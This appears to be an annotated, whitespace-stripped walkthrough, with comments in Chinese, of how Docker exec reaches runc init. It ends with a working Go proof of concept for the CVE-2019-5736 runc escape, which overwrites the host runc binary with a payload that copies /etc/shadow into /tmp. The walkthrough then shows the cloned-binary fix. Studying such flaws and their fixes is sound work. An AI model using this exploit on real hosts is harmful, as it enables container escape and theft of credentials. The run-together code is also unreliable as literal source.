funcrunExec(dockerClicommand.Cli,optionsexecOptions)error{...response,err:=client.ContainerExecCreate(ctx,options.container,*execConfig)iferr!=nil{returnerr}execID:=response.IDifexecID==""{returnerrors.New("exec ID empty")}ifexecConfig.Detach{execStartCheck:=types.ExecStartCheck{Detach:execConfig.Detach,Tty:execConfig.Tty,}returnclient.ContainerExecStart(ctx,execID,execStartCheck)}returninteractiveExec(ctx,dockerCli,execConfig,execID)}
// ContainerExecCreate creates a new exec configuration to run an exec process.
func(cli*Client)ContainerExecCreate(ctxcontext.Context,containerstring,configtypes.ExecConfig)(types.IDResponse,error){varresponsetypes.IDResponseiferr:=cli.NewVersionError("1.25","env");len(config.Env)!=0&&err!=nil{returnresponse,err}resp,err:=cli.post(ctx,"/containers/"+container+"/exec",nil,config,nil)deferensureReaderClosed(resp)iferr!=nil{returnresponse,err}err=json.NewDecoder(resp.body).Decode(&response)returnresponse,err}
func(cli*DaemonCli)start(opts*daemonOptions)(errerror){...//定义api
cli.api=apiserver.New(serverConfig)...//创建Daemon进程
d,err:=daemon.NewDaemon(ctx,cli.Config,pluginStore)iferr!=nil{returnerrors.Wrap(err,"failed to start daemon")}d.StoreHosts(hosts)// validate after NewDaemon has restored enabled plugins. Don't change order.
iferr:=validateAuthzPlugins(cli.Config.AuthorizationPlugins,pluginStore);err!=nil{returnerrors.Wrap(err,"failed to validate authorization plugin")}cli.d=diferr:=startMetricsServer(cli.Config.MetricsAddress);err!=nil{returnerrors.Wrap(err,"failed to start metrics server")}c,err:=createAndStartCluster(cli,d)iferr!=nil{logrus.Fatalf("Error starting cluster component: %v",err)}// Restart all autostart containers which has a swarm endpoint
// and is not yet running now that we have successfully
// initialized the cluster.
d.RestartSwarmContainers()logrus.Info("Daemon has completed initialization")//创建路由信息
routerOptions,err:=newRouterOptions(cli.Config,d)iferr!=nil{returnerr}routerOptions.api=cli.apirouterOptions.cluster=c//初始化路由
initRouter(routerOptions)god.ProcessClusterNotifications(ctx,c.GetWatchStream())cli.setupConfigReloadTrap()// The serve API routine never exits unless an error occurs
// We need to start it as a goroutine and wait on it so
// daemon doesn't exit
serveAPIWait:=make(chanerror)gocli.api.Wait(serveAPIWait)// after the daemon is done setting up we can notify systemd api
notifyReady()// Daemon is fully initialized and handling API traffic
// Wait for serve API to complete
errAPI:=<-serveAPIWaitc.Cleanup()//关闭Daemon进程
// notify systemd that we're shutting down
notifyStopping()shutdownDaemon(d)// Stop notification processing and any background processes
cancel()iferrAPI!=nil{returnerrors.Wrap(errAPI,"shutting down due to ServeAPI error")}logrus.Info("Daemon shutdown complete")returnnil}
再去看initRouter(routerOptions)函数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
funcinitRouter(optsrouterOptions){...routers:=[]router.Router{// we need to add the checkpoint router before the container router or the DELETE gets masked
checkpointrouter.NewRouter(opts.daemon,decoder),container.NewRouter(opts.daemon,decoder,opts.daemon.RawSysInfo(true).CgroupUnified),image.NewRouter(opts.daemon.ImageService()),systemrouter.NewRouter(opts.daemon,opts.cluster,opts.buildkit,opts.features),volume.NewRouter(opts.daemon.VolumesService()),build.NewRouter(opts.buildBackend,opts.daemon,opts.features),sessionrouter.NewRouter(opts.sessionManager),swarmrouter.NewRouter(opts.cluster),pluginrouter.NewRouter(opts.daemon.PluginManager()),distributionrouter.NewRouter(opts.daemon.ImageService()),}...opts.api.InitRouter(routers...)}
// Wait blocks the server goroutine until it exits.
// It sends an error message if there is any error during
// the API execution.
func(s*Server)Wait(waitChanchanerror){iferr:=s.serveAPI();err!=nil{logrus.Errorf("ServeAPI error: %v",err)waitChan<-errreturn}waitChan<-nil}// serveAPI loops through all initialized servers and spawns goroutine
// with Serve method for each. It sets createMux() as Handler also.
func(s*Server)serveAPI()error{varchErrors=make(chanerror,len(s.servers))for_,srv:=ranges.servers{srv.srv.Handler=s.createMux()gofunc(srv*HTTPServer){varerrerrorlogrus.Infof("API listen on %s",srv.l.Addr())iferr=srv.Serve();err!=nil&&strings.Contains(err.Error(),"use of closed network connection"){err=nil}chErrors<-err}(srv)}forranges.servers{err:=<-chErrorsiferr!=nil{returnerr}}returnnil}// createMux initializes the main router the server uses.
func(s*Server)createMux()*mux.Router{m:=mux.NewRouter()logrus.Debug("Registering routers")//遍历之前传入的routers变量,注册路由
for_,apiRouter:=ranges.routers{for_,r:=rangeapiRouter.Routes(){f:=s.makeHTTPHandler(r.Handler())logrus.Debugf("Registering %s, %s",r.Method(),r.Path())m.Path(versionMatcher+r.Path()).Methods(r.Method()).Handler(f)m.Path(r.Path()).Methods(r.Method()).Handler(f)}}debugRouter:=debug.NewRouter()s.routers=append(s.routers,debugRouter)for_,r:=rangedebugRouter.Routes(){f:=s.makeHTTPHandler(r.Handler())m.Path("/debug"+r.Path()).Handler(f)}notFoundHandler:=httputils.MakeErrorHandler(pageNotFoundError{})m.HandleFunc(versionMatcher+"/{path:.*}",notFoundHandler)m.NotFoundHandler=notFoundHandlerm.MethodNotAllowedHandler=notFoundHandlerreturnm}
// initRoutes initializes the routes in container router
func(r*containerRouter)initRoutes(){r.routes=[]router.Route{// HEAD
router.NewHeadRoute("/containers/{name:.*}/archive",r.headContainersArchive),// GET
router.NewGetRoute("/containers/json",r.getContainersJSON),router.NewGetRoute("/containers/{name:.*}/export",r.getContainersExport),router.NewGetRoute("/containers/{name:.*}/changes",r.getContainersChanges),router.NewGetRoute("/containers/{name:.*}/json",r.getContainersByName),router.NewGetRoute("/containers/{name:.*}/top",r.getContainersTop),router.NewGetRoute("/containers/{name:.*}/logs",r.getContainersLogs),router.NewGetRoute("/containers/{name:.*}/stats",r.getContainersStats),router.NewGetRoute("/containers/{name:.*}/attach/ws",r.wsContainersAttach),router.NewGetRoute("/exec/{id:.*}/json",r.getExecByID),router.NewGetRoute("/containers/{name:.*}/archive",r.getContainersArchive),// POST
router.NewPostRoute("/containers/create",r.postContainersCreate),router.NewPostRoute("/containers/{name:.*}/kill",r.postContainersKill),router.NewPostRoute("/containers/{name:.*}/pause",r.postContainersPause),router.NewPostRoute("/containers/{name:.*}/unpause",r.postContainersUnpause),router.NewPostRoute("/containers/{name:.*}/restart",r.postContainersRestart),router.NewPostRoute("/containers/{name:.*}/start",r.postContainersStart),router.NewPostRoute("/containers/{name:.*}/stop",r.postContainersStop),router.NewPostRoute("/containers/{name:.*}/wait",r.postContainersWait),router.NewPostRoute("/containers/{name:.*}/resize",r.postContainersResize),router.NewPostRoute("/containers/{name:.*}/attach",r.postContainersAttach),router.NewPostRoute("/containers/{name:.*}/copy",r.postContainersCopy),// Deprecated since 1.8, Errors out since 1.12
router.NewPostRoute("/containers/{name:.*}/exec",r.postContainerExecCreate),router.NewPostRoute("/exec/{name:.*}/start",r.postContainerExecStart),router.NewPostRoute("/exec/{name:.*}/resize",r.postContainerExecResize),router.NewPostRoute("/containers/{name:.*}/rename",r.postContainerRename),router.NewPostRoute("/containers/{name:.*}/update",r.postContainerUpdate),router.NewPostRoute("/containers/prune",r.postContainersPrune),router.NewPostRoute("/commit",r.postCommit),// PUT
router.NewPutRoute("/containers/{name:.*}/archive",r.putContainersArchive),// DELETE
router.NewDeleteRoute("/containers/{name:.*}",r.deleteContainers),}}
func(s*containerRouter)postContainerExecCreate(ctxcontext.Context,whttp.ResponseWriter,r*http.Request,varsmap[string]string)error{...// Register an instance of Exec in container.
id,err:=s.backend.ContainerExecCreate(name,execConfig)iferr!=nil{logrus.Errorf("Error setting up exec command in container %s: %v",name,err)returnerr}returnhttputils.WriteJSON(w,http.StatusCreated,&types.IDResponse{ID:id,})}
// ContainerExecCreate sets up an exec in a running container.
func(daemon*Daemon)ContainerExecCreate(namestring,config*types.ExecConfig)(string,error){...execConfig:=exec.NewConfig()execConfig.OpenStdin=config.AttachStdinexecConfig.OpenStdout=config.AttachStdoutexecConfig.OpenStderr=config.AttachStderrexecConfig.ContainerID=cntr.IDexecConfig.DetachKeys=keysexecConfig.Entrypoint=entrypointexecConfig.Args=argsexecConfig.Tty=config.TtyexecConfig.Privileged=config.PrivilegedexecConfig.User=config.UserexecConfig.WorkingDir=config.WorkingDir...returnexecConfig.ID,nil}
// ContainerExecStart starts an exec process already created in the docker host.
func(cli*Client)ContainerExecStart(ctxcontext.Context,execIDstring,configtypes.ExecStartCheck)error{resp,err:=cli.post(ctx,"/exec/"+execID+"/start",nil,config,nil)ensureReaderClosed(resp)returnerr}// ContainerExecAttach attaches a connection to an exec process in the server.
// It returns a types.HijackedConnection with the hijacked connection
// and the a reader to get output. It's up to the called to close
// the hijacked connection by calling types.HijackedResponse.Close.
func(cli*Client)ContainerExecAttach(ctxcontext.Context,execIDstring,configtypes.ExecStartCheck)(types.HijackedResponse,error){headers:=map[string][]string{"Content-Type":{"application/json"}}returncli.postHijacked(ctx,"/exec/"+execID+"/start",nil,config,headers)}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// TODO(vishh): Refactor the code to avoid having to specify stream config as part of both create and start.
func(s*containerRouter)postContainerExecStart(ctxcontext.Context,whttp.ResponseWriter,r*http.Request,varsmap[string]string)error{...// Now run the user process in container.
// Maybe we should we pass ctx here if we're not detaching?
iferr:=s.backend.ContainerExecStart(context.Background(),execName,stdin,stdout,stderr);err!=nil{ifexecStartCheck.Detach{returnerr}stdout.Write([]byte(err.Error()+"\r\n"))logrus.Errorf("Error running exec %s in container: %v",execName,err)}returnnil}
// ContainerExecStart starts a previously set up exec instance. The
// std streams are set up.
// If ctx is cancelled, the process is terminated.
func(daemon*Daemon)ContainerExecStart(ctxcontext.Context,namestring,stdinio.Reader,stdoutio.Writer,stderrio.Writer)(errerror){...//通过containerd执行命令
systemPid,err:=daemon.containerd.Exec(ctx,c.ID,ec.ID,p,cStdin!=nil,ec.InitializeStdio)...}
Action:func(context*cli.Context)error{iferr:=checkArgs(context,1,exactArgs);err!=nil{returnerr}iferr:=revisePidFile(context);err!=nil{returnerr}spec,err:=setupSpec(context)iferr!=nil{returnerr}status,err:=startContainer(context,spec,CT_ACT_RUN,nil)iferr==nil{// exit with the container's exit status so any external supervisor is
// notified of the exit with the correct exit status.
os.Exit(status)}returnerr},
funccreateContainer(context*cli.Context,idstring,spec*specs.Spec)(libcontainer.Container,error){rootlessCg,err:=shouldUseRootlessCgroupManager(context)iferr!=nil{returnnil,err}config,err:=specconv.CreateLibcontainerConfig(&specconv.CreateOpts{CgroupName:id,UseSystemdCgroup:context.GlobalBool("systemd-cgroup"),NoPivotRoot:context.Bool("no-pivot"),NoNewKeyring:context.Bool("no-new-keyring"),Spec:spec,RootlessEUID:os.Geteuid()!=0,RootlessCgroups:rootlessCg,})iferr!=nil{returnnil,err}factory,err:=loadFactory(context)iferr!=nil{returnnil,err}returnfactory.Create(id,config)}// loadFactory returns the configured factory instance for execing containers.
funcloadFactory(context*cli.Context)(libcontainer.Factory,error){...returnlibcontainer.New(abs,cgroupManager,intelRdtManager,libcontainer.CriuPath(context.GlobalString("criu")),libcontainer.NewuidmapPath(newuidmap),libcontainer.NewgidmapPath(newgidmap))}// New returns a linux based container factory based in the root directory and
// configures the factory with the provided option funcs.
funcNew(rootstring,options...func(*LinuxFactory)error)(Factory,error){ifroot!=""{iferr:=os.MkdirAll(root,0o700);err!=nil{returnnil,newGenericError(err,SystemError)}}l:=&LinuxFactory{Root:root,InitPath:"/proc/self/exe",// 这里的结果就 InitArgs: "runc init"
InitArgs:[]string{os.Args[0],"init"},Validator:validate.New(),CriuPath:"criu",}Cgroupfs(l)for_,opt:=rangeoptions{ifopt==nil{continue}iferr:=opt(l);err!=nil{returnnil,err}}returnl,nil}
// newProcess returns a new libcontainer Process with the arguments from the
// spec and stdio from the current process.
funcnewProcess(pspecs.Process,initbool,logLevelstring)(*libcontainer.Process,error){//创建libcontainer.process对象
lp:=&libcontainer.Process{Args:p.Args,Env:p.Env,// TODO: fix libcontainer's API to better support uid/gid in a typesafe way.
User:fmt.Sprintf("%d:%d",p.User.UID,p.User.GID),Cwd:p.Cwd,Label:p.SelinuxLabel,NoNewPrivileges:&p.NoNewPrivileges,AppArmorProfile:p.ApparmorProfile,Init:init,LogLevel:logLevel,}//定义consoleSize和Capabilities?(此处操作敏感点?)
ifp.ConsoleSize!=nil{lp.ConsoleWidth=uint16(p.ConsoleSize.Width)lp.ConsoleHeight=uint16(p.ConsoleSize.Height)}ifp.Capabilities!=nil{lp.Capabilities=&configs.Capabilities{}lp.Capabilities.Bounding=p.Capabilities.Boundinglp.Capabilities.Effective=p.Capabilities.Effectivelp.Capabilities.Inheritable=p.Capabilities.Inheritablelp.Capabilities.Permitted=p.Capabilities.Permittedlp.Capabilities.Ambient=p.Capabilities.Ambient}for_,gid:=rangep.User.AdditionalGids{lp.AdditionalGroups=append(lp.AdditionalGroups,strconv.FormatUint(uint64(gid),10))}for_,rlimit:=rangep.Rlimits{rl,err:=createLibContainerRlimit(rlimit)iferr!=nil{returnnil,err}lp.Rlimits=append(lp.Rlimits,rl)}returnlp,nil}
func(c*linuxContainer)Start(process*Process)error{c.m.Lock()deferc.m.Unlock()ifc.config.Cgroups.Resources.SkipDevices{returnnewGenericError(errors.New("can't start container with SkipDevices set"),ConfigInvalid)}ifprocess.Init{iferr:=c.createExecFifo();err!=nil{returnerr}}//实际上调用start()函数
iferr:=c.start(process);err!=nil{ifprocess.Init{c.deleteExecFifo()}returnerr}returnnil}...func(c*linuxContainer)start(process*Process)(retErrerror){//创建process的父进程
parent,err:=c.newParentProcess(process)iferr!=nil{returnnewSystemErrorWithCause(err,"creating new parent process")}logsDone:=parent.forwardChildLogs()iflogsDone!=nil{deferfunc(){// Wait for log forwarder to finish. This depends on
// runc init closing the _LIBCONTAINER_LOGPIPE log fd.
err:=<-logsDoneiferr!=nil&&retErr==nil{retErr=newSystemErrorWithCause(err,"forwarding init logs")}}()}iferr:=parent.start();err!=nil{returnnewSystemErrorWithCause(err,"starting container process")}ifprocess.Init{c.fifo.Close()ifc.config.Hooks!=nil{s,err:=c.currentOCIState()iferr!=nil{returnerr}iferr:=c.config.Hooks[configs.Poststart].RunHooks(s);err!=nil{iferr:=ignoreTerminateErrors(parent.terminate());err!=nil{logrus.Warn(errorsf.Wrapf(err,"Running Poststart hook"))}returnerr}}}returnnil}
func(c*linuxContainer)newParentProcess(p*Process)(parentProcess,error){//创建进程间通信的pipe
parentInitPipe,childInitPipe,err:=utils.NewSockPair("init")iferr!=nil{returnnil,newSystemErrorWithCause(err,"creating new init pipe")}messageSockPair:=filePair{parentInitPipe,childInitPipe}parentLogPipe,childLogPipe,err:=os.Pipe()iferr!=nil{returnnil,fmt.Errorf("Unable to create the log pipe: %s",err)}logFilePair:=filePair{parentLogPipe,childLogPipe}//通过pipe获取cmd
cmd:=c.commandTemplate(p,childInitPipe,childLogPipe)if!p.Init{returnc.newSetnsProcess(p,cmd,messageSockPair,logFilePair)}// We only set up fifoFd if we're not doing a `runc exec`. The historic
// reason for this is that previously we would pass a dirfd that allowed
// for container rootfs escape (and not doing it in `runc exec` avoided
// that problem), but we no longer do that. However, there's no need to do
// this for `runc exec` so we just keep it this way to be safe.
iferr:=c.includeExecFifo(cmd);err!=nil{returnnil,newSystemErrorWithCause(err,"including execfifo in cmd.Exec setup")}//执行newInitProcess(),返回进程对象
returnc.newInitProcess(p,cmd,messageSockPair,logFilePair)}
func(p*initProcess)start()(retErrerror){deferp.messageSockPair.parent.Close()//启动runc init命令
err:=p.cmd.Start()...//向parentPipe中写入bootstrapData,供runc init子进程读取
if_,err:=io.Copy(p.messageSockPair.parent,p.bootstrapData);err!=nil{returnnewSystemErrorWithCause(err,"copying bootstrap data to pipe")}...//parseSync等待子进程回应
ierr:=parseSync(p.messageSockPair.parent,func(sync*syncT)error{...}}
voidnsexec(void){intpipenum;jmp_bufenv;intsync_child_pipe[2],sync_grandchild_pipe[2];structnlconfig_tconfig={0};/*
* Setup a pipe to send logs to the parent. This should happen
* first, because bail will use that pipe.
*///根据环境变量获取pipe
setup_logpipe();/*
* If we don't have an init pipe, just return to the go routine.
* We'll only get an init pipe for start or exec.
*/pipenum=initpipe();if(pipenum==-1)return;/*
* We need to re-exec if we are not in a cloned binary. This is necessary
* to ensure that containers won't be able to access the host binary
* through /proc/self/exe. See CVE-2019-5736.
*///新增的修复代码,确保当前的二进制文件是已经复制过的,并且不是runc自身
if(ensure_cloned_binary()<0)bail("could not ensure we are a cloned binary");...}
init.go中的Action定义为
1
2
3
4
5
6
7
8
9
10
11
12
13
varinitCommand=cli.Command{Name:"init",Usage:`initialize the namespaces and launch the process (do not call it outside of runc)`,Action:func(context*cli.Context)error{factory,_:=libcontainer.New("")iferr:=factory.StartInitialization();err!=nil{// as the error is sent back to the parent there is no need to log
// or write it to stderr because the parent process will handle this
os.Exit(1)}panic("libcontainer: container init failed to exec")},}
// StartInitialization loads a container by opening the pipe fd from the parent to read the configuration and state
// This is a low level implementation detail of the reexec and should not be consumed externally
func(l*LinuxFactory)StartInitialization()(errerror){// Get the INITPIPE.
envInitPipe:=os.Getenv("_LIBCONTAINER_INITPIPE")pipefd,err:=strconv.Atoi(envInitPipe)iferr!=nil{returnfmt.Errorf("unable to convert _LIBCONTAINER_INITPIPE=%s to int: %s",envInitPipe,err)}pipe:=os.NewFile(uintptr(pipefd),"pipe")deferpipe.Close()// Only init processes have FIFOFD.
fifofd:=-1envInitType:=os.Getenv("_LIBCONTAINER_INITTYPE")it:=initType(envInitType)ifit==initStandard{envFifoFd:=os.Getenv("_LIBCONTAINER_FIFOFD")iffifofd,err=strconv.Atoi(envFifoFd);err!=nil{returnfmt.Errorf("unable to convert _LIBCONTAINER_FIFOFD=%s to int: %s",envFifoFd,err)}}...i,err:=newContainerInit(it,pipe,consoleSocket,fifofd,logPipeFd)iferr!=nil{returnerr}// If Init succeeds, syscall.Exec will not return, hence none of the defers will be called.
returni.Init()}
func(l*linuxStandardInit)Init()error{runtime.LockOSThread()deferruntime.UnlockOSThread()if!l.config.Config.NoNewKeyring{iferr:=selinux.SetKeyLabel(l.config.ProcessLabel);err!=nil{returnerr}deferselinux.SetKeyLabel("")ringname,keepperms,newperms:=l.getSessionRingParams()// Do not inherit the parent's session keyring.
ifsessKeyId,err:=keys.JoinSessionKeyring(ringname);err!=nil{// If keyrings aren't supported then it is likely we are on an
// older kernel (or inside an LXC container). While we could bail,
// the security feature we are using here is best-effort (it only
// really provides marginal protection since VFS credentials are
// the only significant protection of keyrings).
//
// TODO(cyphar): Log this so people know what's going on, once we
// have proper logging in 'runc init'.
iferrors.Cause(err)!=unix.ENOSYS{returnerrors.Wrap(err,"join session keyring")}}else{// Make session keyring searcheable. If we've gotten this far we
// bail on any error -- we don't want to have a keyring with bad
// permissions.
iferr:=keys.ModKeyringPerm(sessKeyId,keepperms,newperms);err!=nil{returnerrors.Wrap(err,"mod keyring permissions")}}}iferr:=setupNetwork(l.config);err!=nil{returnerr}iferr:=setupRoute(l.config.Config);err!=nil{returnerr}// initialises the labeling system
selinux.GetEnabled()iferr:=prepareRootfs(l.pipe,l.config);err!=nil{returnerr}// Set up the console. This has to be done *before* we finalize the rootfs,
// but *after* we've given the user the chance to set up all of the mounts
// they wanted.
ifl.config.CreateConsole{iferr:=setupConsole(l.consoleSocket,l.config,true);err!=nil{returnerr}iferr:=system.Setctty();err!=nil{returnerrors.Wrap(err,"setctty")}}// Finish the rootfs setup.
ifl.config.Config.Namespaces.Contains(configs.NEWNS){iferr:=finalizeRootfs(l.config.Config);err!=nil{returnerr}}ifhostname:=l.config.Config.Hostname;hostname!=""{iferr:=unix.Sethostname([]byte(hostname));err!=nil{returnerrors.Wrap(err,"sethostname")}}iferr:=apparmor.ApplyProfile(l.config.AppArmorProfile);err!=nil{returnerrors.Wrap(err,"apply apparmor profile")}forkey,value:=rangel.config.Config.Sysctl{iferr:=writeSystemProperty(key,value);err!=nil{returnerrors.Wrapf(err,"write sysctl key %s",key)}}for_,path:=rangel.config.Config.ReadonlyPaths{iferr:=readonlyPath(path);err!=nil{returnerrors.Wrapf(err,"readonly path %s",path)}}for_,path:=rangel.config.Config.MaskPaths{iferr:=maskPath(path,l.config.Config.MountLabel);err!=nil{returnerrors.Wrapf(err,"mask path %s",path)}}pdeath,err:=system.GetParentDeathSignal()iferr!=nil{returnerrors.Wrap(err,"get pdeath signal")}ifl.config.NoNewPrivileges{iferr:=unix.Prctl(unix.PR_SET_NO_NEW_PRIVS,1,0,0,0);err!=nil{returnerrors.Wrap(err,"set nonewprivileges")}}// Tell our parent that we're ready to Execv. This must be done before the
// Seccomp rules have been applied, because we need to be able to read and
// write to a socket.
iferr:=syncParentReady(l.pipe);err!=nil{returnerrors.Wrap(err,"sync ready")}iferr:=selinux.SetExecLabel(l.config.ProcessLabel);err!=nil{returnerrors.Wrap(err,"set process label")}deferselinux.SetExecLabel("")// Without NoNewPrivileges seccomp is a privileged operation, so we need to
// do this before dropping capabilities; otherwise do it as late as possible
// just before execve so as few syscalls take place after it as possible.
ifl.config.Config.Seccomp!=nil&&!l.config.NoNewPrivileges{iferr:=seccomp.InitSeccomp(l.config.Config.Seccomp);err!=nil{returnerr}}iferr:=finalizeNamespace(l.config);err!=nil{returnerr}// finalizeNamespace can change user/group which clears the parent death
// signal, so we restore it here.
iferr:=pdeath.Restore();err!=nil{returnerrors.Wrap(err,"restore pdeath signal")}// Compare the parent from the initial start of the init process and make
// sure that it did not change. if the parent changes that means it died
// and we were reparented to something else so we should just kill ourself
// and not cause problems for someone else.
ifunix.Getppid()!=l.parentPid{returnunix.Kill(unix.Getpid(),unix.SIGKILL)}// Check for the arg before waiting to make sure it exists and it is
// returned as a create time error.
name,err:=exec.LookPath(l.config.Args[0])iferr!=nil{returnerr}// Close the pipe to signal that we have completed our init.
logrus.Debugf("init: closing the pipe to signal completion")l.pipe.Close()// Close the log pipe fd so the parent's ForwardLogs can exit.
iferr:=unix.Close(l.logFd);err!=nil{returnnewSystemErrorWithCause(err,"closing log pipe fd")}// Wait for the FIFO to be opened on the other side before exec-ing the
// user process. We open it through /proc/self/fd/$fd, because the fd that
// was given to us was an O_PATH fd to the fifo itself. Linux allows us to
// re-open an O_PATH fd through /proc.
fd,err:=unix.Open("/proc/self/fd/"+strconv.Itoa(l.fifoFd),unix.O_WRONLY|unix.O_CLOEXEC,0)iferr!=nil{returnnewSystemErrorWithCause(err,"open exec fifo")}if_,err:=unix.Write(fd,[]byte("0"));err!=nil{returnnewSystemErrorWithCause(err,"write 0 exec fifo")}// Close the O_PATH fifofd fd before exec because the kernel resets
// dumpable in the wrong order. This has been fixed in newer kernels, but
// we keep this to ensure CVE-2016-9962 doesn't re-emerge on older kernels.
// N.B. the core issue itself (passing dirfds to the host filesystem) has
// since been resolved.
// https://github.com/torvalds/linux/blob/v4.9/fs/exec.c#L1290-L1318
unix.Close(l.fifoFd)// Set seccomp as close to execve as possible, so as few syscalls take
// place afterward (reducing the amount of syscalls that users need to
// enable in their seccomp profiles).
ifl.config.Config.Seccomp!=nil&&l.config.NoNewPrivileges{iferr:=seccomp.InitSeccomp(l.config.Config.Seccomp);err!=nil{returnnewSystemErrorWithCause(err,"init seccomp")}}s:=l.config.SpecStates.Pid=unix.Getpid()s.Status=specs.StateCreatediferr:=l.config.Config.Hooks[configs.StartContainer].RunHooks(s);err!=nil{returnerr}iferr:=unix.Exec(name,l.config.Args[0:],os.Environ());err!=nil{returnnewSystemErrorWithCause(err,"exec user process")}returnnil}
packagemain// Implementation of CVE-2019-5736
// Created with help from @singe, @_cablethief, and @feexd.
// This commit also helped a ton to understand the vuln
// https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d
import("fmt""io/ioutil""os""strconv""strings")// This is the line of shell commands that will execute on the host
varpayload="#!/bin/bash \n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow"funcmain(){// First we overwrite /bin/sh with the /proc/self/exe interpreter path
fd,err:=os.Create("/bin/sh")iferr!=nil{fmt.Println(err)return}fmt.Fprintln(fd,"#!/proc/self/exe")err=fd.Close()iferr!=nil{fmt.Println(err)return}fmt.Println("[+] Overwritten /bin/sh successfully")// Loop through all processes to find one whose cmdline includes runcinit
// This will be the process created by runc
varfoundintforfound==0{pids,err:=ioutil.ReadDir("/proc")iferr!=nil{fmt.Println(err)return}for_,f:=rangepids{fbytes,_:=ioutil.ReadFile("/proc/"+f.Name()+"/cmdline")fstring:=string(fbytes)ifstrings.Contains(fstring,"runc"){fmt.Println("[+] Found the PID:",f.Name())found,err=strconv.Atoi(f.Name())iferr!=nil{fmt.Println(err)return}}}}// We will use the pid to get a file handle for runc on the host.
varhandleFd=-1forhandleFd==-1{// Note, you do not need to use the O_PATH flag for the exploit to work.
handle,_:=os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe",os.O_RDONLY,0777)ifint(handle.Fd())>0{handleFd=int(handle.Fd())}}fmt.Println("[+] Successfully got the file handle")// Now that we have the file handle, lets write to the runc binary and overwrite it
// It will maintain it's executable flag
for{writeHandle,_:=os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd),os.O_WRONLY|os.O_TRUNC,0700)ifint(writeHandle.Fd())>0{fmt.Println("[+] Successfully got write handle",writeHandle)writeHandle.Write([]byte(payload))return}}}
//libcontainer/nsenter/cloned_binary.c
intensure_cloned_binary(void){intexecfd;char**argv=NULL;/* Check that we're not self-cloned, and if we are then bail. */intcloned=is_self_cloned();if(cloned>0||cloned==-ENOTRECOVERABLE)returncloned;if(fetchve(&argv)<0)return-EINVAL;//创建克隆文件
execfd=clone_binary();if(execfd<0)return-EIO;if(putenv(CLONED_BINARY_ENV"=1"))gotoerror;fexecve(execfd,argv,environ);error:close(execfd);return-ENOEXEC;}
staticintclone_binary(void){intbinfd,execfd;structstatstatbuf={};size_tsent=0;intfdtype=EFD_NONE;/*
* Before we resort to copying, let's try creating an ro-binfd in one shot
* by getting a handle for a read-only bind-mount of the execfd.
*/execfd=try_bindfd();if(execfd>=0)returnexecfd;/*
* Dammit, that didn't work -- time to copy the binary to a safe place we
* can seal the contents.
*/// 创建空的克隆文件,待写入
execfd=make_execfd(&fdtype);if(execfd<0||fdtype==EFD_NONE)return-ENOTRECOVERABLE;// 这里的应该是原本的runc
binfd=open("/proc/self/exe",O_RDONLY|O_CLOEXEC);if(binfd<0)gotoerror;if(fstat(binfd,&statbuf)<0)gotoerror_binfd;//写入内容
while(sent<statbuf.st_size){intn=sendfile(execfd,binfd,NULL,statbuf.st_size-sent);if(n<0){/* sendfile can fail so we fallback to a dumb user-space copy. */n=fd_to_fd(execfd,binfd);if(n<0)gotoerror_binfd;}sent+=n;}close(binfd);if(sent!=statbuf.st_size)gotoerror;if(seal_execfd(&execfd,fdtype)<0)gotoerror;returnexecfd;error_binfd:close(binfd);error:close(execfd);return-EIO;}